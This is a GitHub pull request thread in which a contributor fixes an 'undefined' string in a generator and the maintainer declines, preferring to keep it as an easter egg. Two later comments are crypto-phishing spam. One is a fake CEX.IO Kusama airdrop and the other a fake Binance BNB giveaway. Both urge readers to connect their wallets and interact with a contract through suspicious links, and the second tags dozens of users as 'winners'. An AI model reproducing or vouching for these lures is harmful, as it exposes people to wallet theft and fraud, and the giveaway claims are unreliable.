### PR TITLE
fix(generator): fix the value of the input as undefined

### PR DESCRIPTION
**Pull request by kev1nzh37**
fix undefined words

### CODE REVIEW

**Comment by kev1nzh37** [comment]
#2

**Comment by kingcos** [comment]
非常感谢群友对 `undefined` 的修复呀，但我还决定将这个「小彩蛋」暂且保留啦～

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

Kusama Exchange


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by parallaxlogicdevelopment** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @zhanggyb, @Hongchenglong, @rogerhuanglife, @zpffly001, @ZhiwenDeng-dev, @msLiu98, @fanyufan, @N-index, @Merlini93, @Yothgewalt, @willycheung, @bitbitpulse, @huhaophp, @pycer, @riccoyu, @narry, @DiDiDaDiDiDa, @avtion, @hankliu62, @nerd010, @lvwxx, @gtm1224, @Andy123qq4, @fangmd, @gd-cho, @armatrix, @yfxong, @staring, @giveahug, @yk47g, @realnumber666, @joshua60, @BravoLu, @jie1789, @2214962083, @cunsheng153, @EwingYangs, @nauqnew, @duktig666, @HaydnHou, @longxiaoLX, @EasyChris, @ChinaArJun, @500mi-mitsui, @conechan, @xieh1995, @view2future, @TonyWu1995, @ManiacHanz, @sunyang-1

**Pull request closed without merging**
